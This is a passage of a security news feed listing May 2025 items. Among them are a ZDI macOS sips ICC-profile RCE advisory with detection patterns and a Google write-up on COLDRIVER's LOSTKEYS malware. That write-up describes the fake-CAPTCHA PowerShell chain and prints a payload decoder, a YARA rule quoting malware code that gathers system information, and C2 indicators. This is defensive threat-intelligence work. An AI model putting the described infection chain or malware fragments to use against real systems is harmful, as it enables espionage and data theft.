ICC Profile file and enticing the victim to process it using a vulnerable version of sips tools. Successful exploitation could result in the execution of arbitrary code in the security context of the target user. Source Code Walkthrough The following code snippet was taken from sips version sips-307 for macOS 15.0.1. Comments added by Trend Research have been highlighted. In sub_1000194D0(): Detection GuidanceTo detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the ports that can be used to deliver an attack that exploits this vulnerability. These include the following ports and services:•            FTP, over ports 20/TCP, 21/TCP•            HTTP, over port 80/TCP•            HTTPS, over port 443/TCP•            IMAP, over port 143/TCP•            NFS, over ports 2049/TCP, 2049/UDP, 111/TCP, 111/UDP•            POP3, over port 110/TCP•            SMB/CIFS, over ports 139/TCP, 445/TCP•            SMTP, over port 25/TCPThe detection device must monitor for transfer of ICC Profile files. If such a file transfer is found, the detection device must inspect its contents. The detection device should verify that the Profile signature field in the Header is equal to the following byte string "\x61\x63\x73\x70". If found, the detection device should get the Count of tags value and compute the size of the Tag Table. After doing that, the Individual Tag Structures from the Tag Table must be processed. For each structure, the tagged element data located at the Offset to tag data from the beginning of the file must be inspected. If the data starts with "\x6d\x42\x41\x20" or "\x6d\x41\x42\x20", the value of the Offset to CLUT field must be checked. If it's equal to the Tag data size field from the corresponding Individual Tag Structure, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.Notes:•   All integers in the described structures are in the big-endian format ConclusionThis vulnerability was patched by the vendor in October. To date, no attacks have been detected in the wild. Apple does not provide any mitigations for this bug, so it is recommended to apply the vendor patch to completely address this issue.Special thanks to Nikolai Skliarenko and Yazhi Wang of the Trend Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Research services, please visit http://go.trendmicro.com/tis/.The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos
Getting started with Conditional Access: 5 must-have Entra ID policies
2025-05-07T18:19:13Z | 1746641953

We walk through Conditional Access prerequisites and recommend the top five CA policies you should implement first.

https://redcanary.com/blog/security-operations/getting-started-with-conditional-access/
RSAC 2025: Security at a Crossroads
2025-05-07T16:50:22Z | 1746636622

RSAC 2025 in San Francisco last week felt like a turning point. It wasn’t just that with over 44,000 attendees, 650 exhibitors, and the industry’s biggest names in attendance, sessions and the exhibit hall were packed as the pandemic fades further into memory The post RSAC 2025: Security at a Crossroads   first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/rsac-2025-security-at-a-crossroads/
COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs
2025-05-07T14:00:00Z | 1746626400

Written by: Wesley Shields Google Threat Intelligence Group (GTIG) has identified a new piece of malware called LOSTKEYS, attributed to the Russian government-backed threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto). LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker. Observed in January, March, and April 2025, LOSTKEYS marks a new development in the toolset of COLDRIVER, a group primarily known for credential phishing against high-profile targets like NATO governments, non-governmental organizations (NGOs), and former intelligence and diplomatic officers. GTIG has been tracking COLDRIVER for many years, including their SPICA malware in 2024. COLDRIVER typically targets high-profile individuals at their personal email addresses or at NGO addresses. They are known for stealing credentials and after gaining access to a target’s account they exfiltrate emails and steal contact lists from the compromised account. In select cases, COLDRIVER also delivers malware to target devices and may attempt to access files on the system. Recent targets in COLDRIVER’s campaigns have included current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs. The group has also continued targeting individuals connected to Ukraine. We believe the primary goal of COLDRIVER’s operations is intelligence collection in support of Russia’s strategic interests. In a small number of cases, the group has been linked to hack-and-leak campaigns targeting officials in the UK and an NGO. To safeguard at-risk users, we use our research on serious threat actors like COLDRIVER to improve the safety and security of Google’s products. We encourage potential targets to enroll in Google's Advanced Protection Program, enable Enhanced Safe Browsing for Chrome, and ensure that all devices are updated. Stage 1 — It Starts With A Fake CAPTCHA LOSTKEYS is delivered at the end of a multi-step infection chain that starts with a lure website with a fake CAPTCHA on it. Once the CAPTCHA has been “verified,” PowerShell is copied to the users clipboard and the page prompts the user to execute the PowerShell via the “run” prompt in Windows: The first stage PowerShell that is pasted in will fetch and execute the second stage. In multiple observed cases, the second stage was retrieved from 165.227.148[.]68. COLDRIVER is not the only threat actor to deliver malware by socially engineering their targets to copy, paste, and then execute PowerShell commands—a technique commonly called “ClickFix.” We have observed multiple APT and financially motivated actors use this technique, which has also been widely reported publicly. Users should exercise caution when encountering a site that prompts them to exit the browser and run commands on their device, and enterprise policies should implement least privilege and disallow users from executing scripts by default. Stage 2 — Device Evasion The second stage calculates the MD5 hash of the display resolution of the device and if the MD5 is one of three specific values it will stop execution, otherwise it will retrieve the third stage. This step is likely done to evade execution in VMs. Each observed instance of this chain uses different, unique identifiers that must be present in the request to retrieve the next stage. In all observed instances the third stage is retrieved from the same host as the previous stages. Stage 3 — Retrieval of the Final Payload The third stage is a Base64-encoded blob, which decodes to more PowerShell. This stage retrieves and decodes the final payload. To do this it pulls down two more files, from the same host as the others, and again using different unique identifiers per infection chain. The first is a Visual Basic Script (VBS) file, which we call the “decoder” that is responsible for decoding the second one. The decoding process uses two keys, which are unique per infection chain. The decoder has one of the unique keys and the second key is stored in stage 3. The keys are used in a substitution cipher on the encoded blob, and are unique to each infection chain. A Python script to decode the final payload is: # Args: encoded_file Ah90pE3b 4z7Klx1V import base64 import sys if len(sys.argv) != 4: print("Usage: decode.py file key1 key2") sys.exit(1) if len(sys.argv[2]) != len(sys.argv[3]): print("Keys must be the same length") sys.exit(1) with open(sys.argv[1], 'r') as f: data = f.read() x = sys.argv[2] y = sys.argv[3] for i in range(len(x)): data = data.replace(x[i], '!').replace(y[i], x[i]).replace('!', y[i]) with open(sys.argv[1] + '.out', 'wb') as f: f.write(base64.b64decode(data)) The Final Payload (LOSTKEYS) The end result of this is a VBS that we call LOSTKEYS. It is a piece of malware that is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker. The typical behavior of COLDRIVER is to steal credentials and then use them to steal emails and contacts from the target, but as we have previously documented they will also deploy malware called SPICA to select targets if they want to access documents on the target system. LOSTKEYS is designed to achieve a similar goal and is only deployed in highly selective cases. A Link To December 2023 As part of the investigation into this activity, we discovered two additional samples, hashes of which are available in the Indicators of Compromise section, dating back as early as December 2023. In each case, the samples end up executing LOSTKEYS but are distinctly different from the execution chain mentioned here in that they are Portable Executable (PE) files pretending to be related to the software package Maltego. It is currently unclear if these samples from December 2023 are related to COLDRIVER, or if the malware was repurposed from a different developer or operation into the activity seen starting in January 2025. Protecting the Community As part of our efforts to combat threat actors, we use the results of our research to improve the safety and security of Google’s products. Upon discovery, all identified malicious websites, domains and files are added to Safe Browsing to protect users from further exploitation. We also send targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity and encouraging potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated. We are committed to sharing our findings with the security community to raise awareness and with companies and individuals that might have been targeted by these activities. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry. Indicators of compromise (IOCs) and YARA rules are included in this post, and are also available as a GTI collection and rule pack.  YARA Rules rule LOSTKEYS__Strings { meta: author = "Google Threat Intelligence" description = "wscript that steals documents and becaons system information out to a hardcoded address" hash = "28a0596b9c62b7b7aca9cac2a07b067109f27d327581a60e8cb4fab92f8f4fa9" strings: $rep0 = "my_str = replace(my_str,a1,\"!\" )" $rep1 = "my_str = replace(my_str,b1 ,a1 )" $rep2 = "my_str = replace(my_str,\"!\" ,b1 )" $mid0 = "a1 = Mid(ch_a,ina+1,1)" $mid1 = "b1 = Mid(ch_b,ina+1,1)" $req0 = "ReqStr = base64encode( z & \";\" & ws.ExpandEnvironmentStrings(\"%COMPUTERNAME%\") & \";\" & ws.ExpandEnvironmentStrings(\"%USERNAME%\") & \";\" & fso.GetDrive(\"C:\\\").SerialNumber)" $req1 = "ReqStr = Chain(ReqStr,\"=+/\",\",-_\")" $cap0 = "CapIN \"systeminfo > \"\"\" & TmpF & \"\"\"\", 1, True" $cap1 = "CapIN \"ipconfig /all >> \"\"\" & TmpF & \"\"\"\", 1, True" $cap2 = "CapIN \"net view >> \"\"\" & TmpF & \"\"\"\", 1, True" $cap3 = "CapIN \"tasklist >> \"\"\" & TmpF & \"\"\"\", 1, True" condition: all of ($rep*) or all of ($mid*) or all of ($req*) or all of ($cap*) } Indicators of Compromise IOC Notes 13f7599c94b9d4b028ce02397717a1282a46f07b9d3e2f8f2b3213fa8884b029 Stage 1 - Fake CAPTCHA page, loads PowerShell to clipboard 4c7accba35edd646584bb5a40ab78f963de45e5fc816e62022cd7ab1b01dae9c Stage 2: Device evasion and stage 3 loader 6b85d707c23d68f9518e757cc97adb20adc8accb33d0d68faf1d8d56d7840816 Stage 3: Retrieve and decode final payload, contains key “Ah90pE3b” 3233668d2e4a80b17e6357177b53539df659e55e06ba49777d0d5171f27565dd Decoder script, contains key “4z7Klx1V” 6bc411d562456079a8f1e38f3473c33ade73b08c7518861699e9863540b64f9a Final payload, encoded 28a0596b9c62b7b7aca9cac2a07b067109f27d327581a60e8cb4fab92f8f4fa9 Final payload, decoded 165.227.148[.]68 C2 cloudmediaportal[.]com C2 b55cdce773bc77ee46b503dbd9430828cc0f518b94289fbfa70b5fbb02ab1847 Binary that executes LOSTKEYS from December 2023 02ce477a07681ee1671c7164c9cc847b01c2e1cd50e709f7e861eaab89c69b6f Binary that executes LOSTKEYS from December 2023 8af28bb7e8e2f663d4b797bf3ddbee7f0a33f637a33df9b31fbb4c1ce71b2fee LOSTKEYS from December 2023 njala[.]dev C2 from December 2023 80.66.88[.]67 C2 from December 2023

https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos/
New DOGE Big Balls Ransomware Tools in the Wild
2025-05-07T14:00:00Z | 1746626400

Summary During the Netskope Threat Labs hunting activities, we came across a payload that led us to a multi-stage chain involving several custom PowerShell scripts, open source tools (such as Mimikatz and Rubeus), vulnerable drivers being exploited, and red team framework payloads (such as Havoc). After further investigation, we discovered these files were part of […] The post New DOGE Big Balls Ransomware Tools in the Wild appeared first on Netskope.

https://www.netskope.com/blog/new-doge-big-balls-ransomware-tools-in-the-wild
NCDSMO Certified XD Vision: Scalable Collaboration for the Modern Mission
2025-05-07T13:35:48Z | 1746624948

In our previous blog, “Enhancing Coalition Collaboration with Scalable Cross Domain Solutions,” we discussed the growing necessity for secure, real-time data sharing across varying classification levels and coalition partners, especially as multi-domain operations (MDO) become central to modern defense strategies.   Today, we’re excited to provide a significant update: our scalable enterprise cross domain solution (CDS),... View Article The post NCDSMO Certified XD Vision: Scalable Collaboration for the Modern Mission  appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/xdvision-ncdsmo-certified-announcement/
Preparing for post-quantum threat will make "fixing the Millennium Bug look easy"
2025-05-07T13:07:41Z | 1746623261

NCSC's CTO urges organisations to recognise “decade-long, national-scale technology change” required to prepare for the post-quantum threat.

https://www.ncsc.gov.uk/news/preparing-for-post-quantum-threat
Delivering on Our Commitment to Empower Customers with Future-Proof Solutions
2025-05-07T13:00:03Z | 1746622803

As I reflect on the tremendous progress our company has made since I joined three years ago, I want to take a moment to thank our customers for their continued trust and say how honored and grateful I am to lead this incredible team.   Ivanti’s commitment to providing our customers with seamless, innovative, and secure solutions is unwavering. Our goal is to exceed industry standards, and we understood from the start that meaningful advancements do not happen overnight. I would like to share some of our recent updates with you today.   Financial Flexibility Enables Continued Progress and Innovation  Last week, Ivanti announced a pivotal transaction that provides us with an additional $350 million in capital and extends our current debt obligations until 2029. As we sat down with our investors to outline our journey toward a SaaS-focused model, their responses underscored their collective confidence in our progress and the long-term prospects for our business. Our newly optimized capital structure affords Ivanti financial flexibility as we continue our transformation and accelerate innovation to meet the evolving needs of our customers.  Industry-Defining Product Security Aligned with Secure by Design Principles   Over the past year, we have shared the many ways we have doubled down on our Secure by Design commitments, taking steps to secure our products, and backing these actions with substantial investments and increases in our security team resources. It was critical for us that our pledge be more than just lip service; we were committing to actively and consistently taking steps to incorporate Secure by Design principles into every stage of our product development and decision-making processes.   Our transition to a SaaS model marks another crucial step in delivering future-proof solutions to our customers. Cloud solutions are inherently more secure, and we have made meaningful efforts to remove any roadblocks–whether financial, contractual, or functionality-driven–to support customer migration to the most up-to-date offerings via a disciplined installed base management program. Over the last 2.5 years, we have successfully migrated thousands of customers from on-prem to Ivanti Neurons solutions, with most new customers adopting our advanced, cloud-based offerings.    As part of our goal to ease the burden of security management for customers, we’ve made significant investments to automatically, and proactively counter current and future threats in our Ivanti Neurons cloud-based platform. As one example, we are rolling out important enhancements in our Neurons for Secure Access (nSA), which enable any Connect Secure edge appliance connected to nSA to be automatically patched by Ivanti in the event of a vulnerability. This technology aligns with our Secure by Design pledge and represents an important path forward for the industry in proactive security management.   Additionally, in April we announced Ring Deployment, an important innovation in Ivanti Neurons for Patch Management. An increasing number of N-Day compromises result from delays in patching, as IT teams manage a seemingly relentless stream of releases. Ring Deployment allows devices to be strategically organized based on specific needs or risk levels, enabling a controlled and prioritized patch rollout with minimal disruption to production systems.  This reduces IT team strain, streamlines patch management, and fortifies customers’ environments.  Strength in Transparency and Proactive Vulnerability Management   Finally, I want to take a moment to touch on a topic that seems to get a lot of attention in the media.   At Ivanti, we view transparency as fundamental to customer trust and security. Our philosophy is simple: discovering and communicating vulnerabilities, and sharing that information with defenders, is not an indication of weakness; rather it is evidence of rigorous scrutiny and a proactive vulnerability management program. By aggressively seeking to identify and address vulnerabilities, our aim is to get ahead of threat actors and ensure our customers can take the steps needed to protect themselves.   At Ivanti, we will always advocate for transparency in CVE disclosures, both for our own products, and across the industry. It is our belief that vulnerabilities that go unnoticed and unaddressed may keep companies out of the headlines, but it also means their customers do not have the insights needed to fully understand and protect against risks. To this end, we also engage deeply with the security community, maintain long-term partnerships with leading security experts, and actively collaborate with government agencies. We work with our partners to share intelligence with defenders that goes above and beyond standard disclosure practices. This helps prevent threat actors from replicating new attack patterns or threat vectors against others in the market, and we firmly believe this is a practice that everyone in the security and software industries should adhere to.    Looking Ahead  Ivanti is proud to be our customers’ trusted partner in IT management and security.  As we look forward, our comprehensive security strategy will continue to be anchored in customer-centricity, enabling our customers to thrive and focus on what they do best.    To all our customers — thank you for trusting us to be your partner in this journey. Together, we will continue to navigate the complexities of today’s threat landscape and build a secure and innovative future.  Warm regards,  Dennis Kozak  CEO, Ivanti

https://www.ivanti.com/blog/delivering-on-our-commitment-to-empower-customers-with-future-proof-solutions
Kubernetes IngressNightmare: Wake Up and Fight Back with Microsegmentation
2025-05-07T13:00:00Z | 1746622800

Discover how to defend Kubernetes from Ingress vulnerabilities with microsegmentation and Zero Trust security from Akamai. Stay protected ? inside and out.

https://www.akamai.com/blog/security/2025/may/kubernetes-ingressnightmare-wake-up-fight-back-microsegmentation
Divide AND Protect Your Network with Secure, Automated Microsegmentation
2025-05-07T13:00:00Z | 1746622800

Modern enterprise networks span data centers, clouds, branch locations, remote endpoints, and everything in between – a complex, ever-shifting web of workloads, devices, and identities. While perimeter defenses remain critical, modern threats demand a defense-in-depth strategy to swiftly contain threats and block lateral movement. This is achieved through integrated best-in-class protections across network boundaries and data center environments, augmented by granular access controls. Palo…

https://zeronetworks.com/blog/divide-and-protect-your-network-with-secure-automated-microsegmentation
From Insight to Innovation: Can Observability Guarantee Continuous Network Advancement?
2025-05-07T13:00:00Z | 1746622800

Communications service providers (CSPs) need to continuously evaluate network performance 24/7 to assure service and end users’ quality of experience. This blog reports details from a Fierce Network interview with Bruce Kelley, senior vice president and chief technology officer at NETSCOUT, about the importance of...

https://www.netscout.com/blog/insight-innovation-can-observability-guarantee-continuous
SonicWall SMA100 SSL-VPN Affected By Multiple Vulnerabilities
2025-05-07T12:53:25Z | 1746622405

1) CVE-2025-32819 - Post-Authentication SSLVPN user arbitrary file delete vulnerabilityA vulnerability in SMA100 allows a remote authenticated attacker with SSLVPN user privileges to bypass the path traversal checks and delete an arbitrary file potentially resulting in a reboot to factory default settings. CVSS Score: 8.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CWE-552: Files or Directories Accessible to External Parties 2) CVE-2025-32820 - Post-Authentication SSLVPN user Path Traversal vulnerabilityA vulnerability in SMA100 allows a remote authenticated attacker with SSLVPN user privileges can inject a path traversal sequence to make any directory on the SMA appliance writable. CVSS Score: 8.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') 3) CVE-2025-32821 - Post-Authentication SSLVPN admin remote command injection vulnerabilityA vulnerability in SMA100 allows a remote authenticated attacker with SSLVPN admin privileges can with admin privileges can inject shell command arguments to upload a file on the appliance.CVSS Score: 6.7 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') SonicWall SSL VPN SMA1000 series products are not affected by these vulnerabilities. SonicWall strongly advises users of the SMA 100 series products (SMA 200, 210, 400, 410, and 500v) to upgrade to the mentioned fixed release version to address these vulnerabilities. CVE: CVE-2025-32819, CVE-2025-32820, CVE-2025-32821 Last updated: May 19, 2025, 12:36 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0011
The Wake-Up Call Retailers Can’t Ignore: Proactively Securing Your Digital Supply Chain
2025-05-07T11:00:00Z | 1746615600

Retailers in the UK are facing a harsh cybersecurity reality. In just the first half of 2025, iconic brands have all made headlines—not for new product launches or seasonal sales—but for cyberattacks that put customer data, brand trust, and revenue at risk.

https://blog.riskrecon.com/the-wake-up-call-retailers-cant-ignore-proactively-securing-your-digital-supply-chain
NSO Group fined $168M for illegally spying on WhatsApp Users
2025-05-07T10:41:41Z | 1746614501

A U.S. federal jury has ordered Israeli surveillance firm NSO Group to pay Meta-owned WhatsApp nearly $168 million in damages, concluding a high-profile legal battle over the use of Pegasus spyware to target over 1,400 users worldwide. The decision comes more than four months after U.S. District Judge Phyllis J. Hamilton ruled that NSO Group violated federal laws by exploiting WhatsApp’s servers to deploy Pegasus. The spyware was used to surveil journalists, human rights defenders, and political dissidents, according to a lawsuit WhatsApp filed in 2019. Court records revealed the global scale of the targeting, including 456 victims in Mexico, […] The post NSO Group fined $168M for illegally spying on WhatsApp Users first appeared on Cybersafe News.

https://cybersafe.news/nso-group-fined-168m-for-illegally-spying-on-whatsapp-users/
NCSC warns of IT helpdesk impersonation trick being used by ransomware gangs after UK retailers attacked
2025-05-07T10:18:34Z | 1746613114

The UK's National Cyber Security Centre (NCSC) has warned the IT helpdesks of retailers to be on their guard against bogus support calls they might receive from hackers pretending to be staff locked out of their accounts. Read more in my article on the Exponential-e blog.

https://www.exponential-e.com/blog/ncsc-warns-of-it-helpdesk-impersonation-trick-being-used-by-ransomware-gangs-after-uk-retailers-attacked
How CISOs Can Defend Against Financial Services Cybersecurity Threats
2025-05-07T10:17:24Z | 1746613044

For CISOs leading security in financial services, 2025 presents a turning point. Cyberattacks are no longer singular, blunt-force events. They are sophisticated campaigns designed to evade traditional detection, exploit regulatory blind spots, and erode institutional trust. And while artificial intelligence has created efficiencies for defenders, it has also supercharged the capabilities of attackers. The sector […] The post How CISOs Can Defend Against Financial Services Cybersecurity Threats appeared first on CounterCraft.

https://www.countercraftsec.com/blog/how-cisos-can-defend-against-financial-services-cybersecurity-threats/
Iranian Cyber Actors Impersonate Model Agency in Suspected Espionage Operation
2025-05-07T10:00:55Z | 1746612055

A suspected Iranian espionage campaign impersonated a model agency site for data collection, including fictitious models as possible social engineering lures. The post Iranian Cyber Actors Impersonate Model Agency in Suspected Espionage Operation appeared first on Unit 42.

https://unit42.paloaltonetworks.com/iranian-attackers-impersonate-model-agency/
State of ransomware in 2025
2025-05-07T10:00:39Z | 1746612039

Kaspersky researchers review ransomware trends for 2024, analyze the most active groups and forecast how this threat will evolve in 2025.

https://securelist.com/state-of-ransomware-in-2025/116475/
CC-4651 - Proof-of-Concept Released for SysAid On-Premise
2025-05-07T09:57:00Z | 1746611820

Severity: Medium Four vulnerabilities could allow an attacker to perform unauthenticated remote command execution Four vulnerabilities could allow an attacker to perform unauthenticated remote command execution Updated: 23 May 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4651
SysOwned, Your Friendly Support Ticket - SysAid On-Premise Pre-Auth RCE Chain (CVE-2025-2775 And Friends)
2025-05-07T09:38:35Z | 1746610715

It’s… another week, and another vendor who is apparently experienced with ransomware gangs but yet struggles with email.In what we've seen others term "the watchTowr treatment", we are once again (surprise, surprise) disclosing vulnerability research that allowed us to gain pre-authenticated Remote

https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
Beware of phone scams demanding money for ‘missed jury duty’
2025-05-07T09:00:00Z | 1746608400

When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.

https://www.welivesecurity.com/en/scams/phone-scams-demanding-money-missed-jury-duty/
Software Code of Practice: building a secure digital future
2025-05-07T08:06:21Z | 1746605181

New voluntary code of practice for technology providers defines a market baseline for cyber security.

https://www.ncsc.gov.uk/blog-post/software-code-of-practice-building-a-secure-digital-future
What’s New Device Platform Intelligence on May 07, 2025
2025-05-07T07:02:22Z | 1746601342

Go to Device Platform Intelligence Added Platforms 29 Platforms are added Platform Name Node Type2 Node Type Advan G Pro Phone Mobile Phone Mobile Device Alldocube iPlay60 mini Pro Tablet Tablet & PMP Mobile Device Anbernic RG 406H Game Console Gaming console IoT/OT Canon G600 Printer Printer Printer Canon GX4000 series Printer Printer Printer Cisco […]

https://www.genians.com/dpi/dpi-update-notice/device-platform-intelligence-update-notice-may-7-2025/
Cisco Study Reveals Alarming Deficiencies in Security Readiness
2025-05-07T07:01:00Z | 1746601260

According to Cisco’s 2025 Cybersecurity Readiness Index, only 4% of organizations worldwide have achieved the 'Mature' level of readiness required to effectively withstand today’s cybersecurity threats.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-study-reveals-alarming-deficiencies-in-security-readiness.html
Cybersecurity Readiness Index 2025
2025-05-07T07:00:00Z | 1746601200

Cisco's third annual Cybersecurity Readiness Index is an updated guide that addresses the current global cybersecurity landscape and assesses how ready organizations are to face today's cybersecurity risks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cybersecurity-readiness-index-2025.html
Cybersecurity Readiness Index 2025
2025-05-07T07:00:00Z | 1746601200

Cisco's third annual Cybersecurity Readiness Index is an updated guide that addresses the current global cybersecurity landscape and assesses how ready organizations are to face today's cybersecurity risks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cybersecurity-readiness-index-2025.html
Aprill küberruumis: mitu inimest kaotasid pettuste tõttu kümneid tuhandeid eurosid
2025-05-07T06:29:49Z | 1746599389

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et aprillis 2025 registreeriti Eestis täpselt tuhat mõjuga küberintsidenti, millest suurema osa moodustasid petu- ja õngitsuslehed.

https://ria.ee/uudised/aprill-kuberruumis-mitu-inimest-kaotasid-pettuste-tottu-kumneid-tuhandeid-eurosid
Security Alert (A25-05-04): Vulnerability in Google Chrome
2025-05-07T04:00:00Z | 1746590400

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Non-Human Identities: The Fastest-Growing Attack Surface You May Be Ignoring
2025-05-06T22:02:05Z | 1746568925

In the world of identity and access management (IAM), the term “identity” has traditionally referred to people — employees, contractors, partners, and customers. But in today’s highly automated, cloud-first environments, non-human identities (NHIs) now vastly outnumber human ones. And that shift brings new challenges, new risks, and new urgency for organizations looking to stay secure.… The post Non-Human Identities: The Fastest-Growing Attack Surface You May Be Ignoring appeared first on Portnox.

https://www.portnox.com/blog/security-trends/non-human-identities-the-fastest-growing-attack-surface-you-may-be-ignoring/
RSAC 2025 Takeaway: In the Age of AI, Trust Remains the Foundation of Cybersecurity and Always Has Been at Genians
2025-05-06T20:09:52Z | 1746562192

At RSAC 2025, AI and trust stood out as key themes in securing both systems and organizations. Genians has embodied this focus for over 20 years, delivering cybersecurity through real-time visibility and data integrity. With Device Platform Intelligence at its core, our platform supports NAC, ZTNA, EDR, and NaaS across hybrid IT/OT environments without full-stack complexity. Attendees responded to our AI-ready, data-driven approach. See how Genians builds security on trust and intelligence.

https://www.genians.com/learn-more/insights/rsac-2025-takeaway-in-the-age-of-ai-trust-remains-the-foundation-of-cybersecurity-and-always-has-been-at-genians/
The Top Threat Actor Groups Targeting the Financial Sector
2025-05-06T19:01:28Z | 1746558088

In this post, we identify and analyze the top threat actors that have been actively targeting the financial sector between April 2024 and April 2025. The post The Top Threat Actor Groups Targeting the Financial Sector appeared first on Flashpoint.

https://flashpoint.io/blog/top-threat-actor-groups-targeting-financial-sector/
New assurance initiatives to help boost confidence in cyber resilience
2025-05-06T17:00:47Z | 1746550847

Two initiatives designed to raise national cyber resilience announced at the NCSC's CYBERUK 2025 conference.

https://www.ncsc.gov.uk/news/new-assurance-initiatives-boost-cyber-resilience
Tenable Opens New Operations Center in Tel Aviv
2025-05-06T16:07:02Z | 1746547622

Tenable®, the exposure management company, today announced it has moved its operations center to the Landmark TLV Building in Tel Aviv. Occupying multiple floors in this top office space, the expansion marks a significant milestone in the company’s growth strategy in Israel and strengthens its commitment to innovation and collaboration with the dynamic Israeli cybersecurity community. This relocation unites Tenable’s 250 employees from across the region under one roof. The new Tel Aviv office will facilitate key functional areas such as research and development, along with product innovation for the Tenable One Exposure Management Platform, Tenable Cloud Security and Tenable OT Security, among others. This strategic investment not only streamlines operations but also positions Tenable for continued growth as it actively seeks to recruit top-tier talent for newly-created roles. “This marks an exciting new chapter for Tenable and reflects our deep commitment to the incredible people and talent here,” said Steve Vintz, Co-CEO and CFO of Tenable. “Israel is a global leader in cybersecurity, and we’re proud to be part of such an active and innovative community. Bringing our teams together under one roof not only strengthens collaboration but also reinforces our dedication to growing with – and investing in – the companies and future technology leaders who make this region so exceptional.”

https://www.tenable.com/press-releases/tenable-opens-new-operations-center-in-tel-aviv
MixMode Releases 2025 State of AI in Cybersecurity Report
2025-05-06T15:05:17Z | 1746543917

MixMode, a leader in AI-powered cybersecurity, today released State of AI in Cybersecurity Report 2025, its second annual report, independently conducted by the Ponemon Institute. Based on a survey of 685 U.S. IT and security professionals, the report reveals how organizations, especially in Critical Infrastructure, SLED, and U.S. Federal sectors, are adopting AI to counter evolving cyber threats.

https://mixmode.ai/blog/mixmode-releases-2025-state-of-ai-in-cybersecurity-report/
Practical quantum computing, accelerated
2025-05-06T15:00:00Z | 1746543600

From qubits to quantum data centers - Cisco’s quantum network entanglement chip is here.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/practical-quantum-computing-accelerated.html
OT Security Trends 2025: Defending Against Escalating Threats and Evolving Tactics
2025-05-06T14:26:00Z | 1746541560

The industrial sector experienced the sharpest increase of any sector in the average cost of a data breach in 2024 – rising by $830,000 per incident. At the same time, 80% of manufacturers have seen a significant increase in overall security incidents in recent years. What’s driving the increased pace and price of industrial cyberattacks? Operational technology (OT) security challenges. While ransomware groups targeting OT rose 60% last year, only 19% of organizations felt they were…

https://zeronetworks.com/blog/ot-security-trends-2025-escalating-threats-evolving-tactics
Upozorenje: Oprezno s WhatsApp porukama
2025-05-06T14:05:29Z | 1746540329

Nacionalni CERT zaprimio je prijave o phishing (smishing) prijevari putem preuzetog WhatsApp računa te je prijavio prijevare izvorima incidenta i nadležnim CERT timovima.  Primjeri WhatsApp poruka: Sadržaj lažnih WhatsApp poruka je: “Glasajte za moje dijete na natjecanju” Možete primiti poruku od poznate osobe s poveznicom za glasovanje na natjecanju. Nakon klika traži se unos kôda... The post Upozorenje: Oprezno s WhatsApp porukama first appeared on CERT.hr.

https://www.cert.hr/upozorenje-oprezno-s-whatsapp-porukama/
Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines
2025-05-06T14:00:00Z | 1746540000

Background UNC3944, which overlaps with public reporting on Scattered Spider, is a financially-motivated threat actor characterized by its persistent use of social engineering and brazen communications with victims. In early operations, UNC3944 largely targeted telecommunications-related organizations to support SIM swap operations. However, after shifting to ransomware and data theft extortion in early 2023, they impacted organizations in a broader range of industries. Since then, we have regularly observed UNC3944 conduct waves of targeting against a specific sector, such as financial services organizations in late 2023 and food services in May 2024. Notably, UNC3944 has also previously targeted prominent brands, possibly in an attempt to gain prestige and increased attention by news media. Google Threat Intelligence Group (GTIG) observed a decline in UNC3944 activity after 2024 law enforcement actions against individuals allegedly associated with the group. Threat actors will often temporarily halt or significantly curtail operations after an arrest, possibly to reduce law enforcement attention, rebuild capabilities and/or partnerships, or shift to new tooling to evade detection. UNC3944’s existing ties to a broader community of threat actors could potentially help them recover from law enforcement actions more quickly. Recent public reporting has suggested that threat actors used tactics consistent with Scattered Spider to target a UK retail organization and deploy DragonForce ransomware. Subsequent reporting by BBC News indicates that actors associated with DragonForce claimed responsibility for attempted attacks at multiple UK retailers. Notably, the operators of DragonForce ransomware recently claimed control of RansomHub, a ransomware-as-a-service (RaaS) that seemingly ceased operations in March of this year. UNC3944 was a RansomHub affiliate in 2024, after the ALPHV (aka Blackcat) RaaS shut down. While GTIG has not independently confirmed the involvement of 